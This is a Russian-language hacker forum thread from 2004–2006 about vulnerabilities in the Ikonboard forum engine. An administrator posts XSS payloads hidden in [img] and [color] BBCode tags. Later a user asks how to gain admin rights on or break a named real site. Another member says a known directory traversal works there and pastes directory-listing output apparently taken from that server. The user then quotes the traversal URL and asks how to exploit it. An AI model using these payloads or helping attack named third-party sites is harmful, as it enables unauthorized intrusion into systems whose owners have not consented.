Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Какие Уязвимости есть в Iconboard? |

19.08.2004, 10:59
|
|
Участник форума
Регистрация: 11.06.2004
Сообщений: 266
Провел на форуме: 15191
Репутация:
13
|
|
Какие Уязвимости есть в Iconboard?
Какие Уязвимости есть в Iconboard???
Знаю про баг который позволяет пользователям обратится к ограниченным ресурсам но эта дыра заклеена... существую ли ещё какие нить баги?
|
|
|

22.08.2004, 23:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Парень тебе здесь никто не скажет т.к этот форум на таком движке стоит
|
|
|
|

22.08.2004, 23:34
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме: 4618051
Репутация:
45
|
|
Есть xss в теге [img] ...
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
[IMG]javascript:alert('antichat.ru')[/IMG]
[/QUOTE]<span id='postcolor'>
И в теге [color]
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
[color=red;background-image:url('javascript:alert('LOL')')]antichat[/color]
[/QUOTE]<span id='postcolor'>
|
|
|

28.08.2004, 10:17
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме: 5355463
Репутация:
2258
|
|
ne zaplatalai diru chto li? 
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|

28.08.2004, 13:50
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме: 2050916
Репутация:
0
|
|
В нашем форуме это пофиксено
|
|
|

14.11.2006, 22:19
|
|
Новичок
Регистрация: 05.11.2006
Сообщений: 11
Провел на форуме: 80296
Репутация:
-11
|
|
че можна зделать с board.zeos.net Можно получить права админа или просто сламать
|
|
|

14.11.2006, 22:26
|
|
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме: 5559831
Репутация:
1833
|
|
Сообщение от RAMOS
че можна зделать с board.zeos.net Можно получить права админа или просто сламать
Знаю я его 
Там действует одна из уязвимостей,которая описана в обзоре данного движка .
http://forum.antichat.ru/thread26024.html
P/s:Задрало говорить юзай поиск !
Последний раз редактировалось _-[A.M.D]HiM@S-_; 14.11.2006 в 22:28..
|
|
|

14.11.2006, 22:40
|
|
Новичок
Регистрация: 05.11.2006
Сообщений: 11
Провел на форуме: 80296
Репутация:
-11
|
|
cgi-bin/forum/ikonboard.cgi?act=UserCP;CODE=01;MODE=1;useravatar _dir=../../../
ета уязвимость там не работает , там нет никаких ID , там есть чтото наподобие MID=90-1162285788 и ссылка там не site/cgi-bin/forum/ikonboard.cgi? , а site/cgi-bin/ikonboard.cgi? ЕСТЬ на него какието еще уязвимости
Последний раз редактировалось RAMOS; 14.11.2006 в 22:44..
|
|
|

14.11.2006, 22:48
|
|
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме: 5559831
Репутация:
1833
|
|
Сообщение от RAMOS
ета уязвимость там не работает , там нет никаких ID , там есть чтото наподобие MID=90-1162285788 и ссылка там не site/cgi-bin/forum/ikonboard.cgi? , а site/cgi-bin/ikonboard.cgi? ЕСТЬ на него какието еще уязвимости
З.ы:У меня почимуто там все роботает
Код:
<option value='banner.zeos.net'>banner.zeos</option>
<option value='board.zeos.net'>board.zeos</option>
<option value='cgi-bin'></option>
<option value='club.pixelfab.com'>club.pixelfab</option>
<option value='htdocs'></option>
<option value='icons'></option>
<option value='new.zeos.net'>new.zeos</option>
<option value='old.zeos.net'>old.zeos</option>
<option value='test.zeos.net'>test.zeos</option>
<option value='us.zeos.net'>us.zeos</option>
<option value='www.incubus.net'>www.incubus</option>
<option value='www.pixelfab.com'>www.pixelfab</option>
<option value='www.polar.kiev.ua'>www.polar.kiev</option>
<option value='www.zeos.net'>www.zeos</option>
Последний раз редактировалось _-[A.M.D]HiM@S-_; 14.11.2006 в 22:51..
|
|
|

14.11.2006, 22:53
|
|
Новичок
Регистрация: 05.11.2006
Сообщений: 11
Провел на форуме: 80296
Репутация:
-11
|
|
как мне ето использовать , что писать после /cgi-bin/ikonboard.cgi?act=UserCP;CODE=01;MODE=1 , и что мне даст ета уязвимость
Последний раз редактировалось RAMOS; 14.11.2006 в 23:18..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|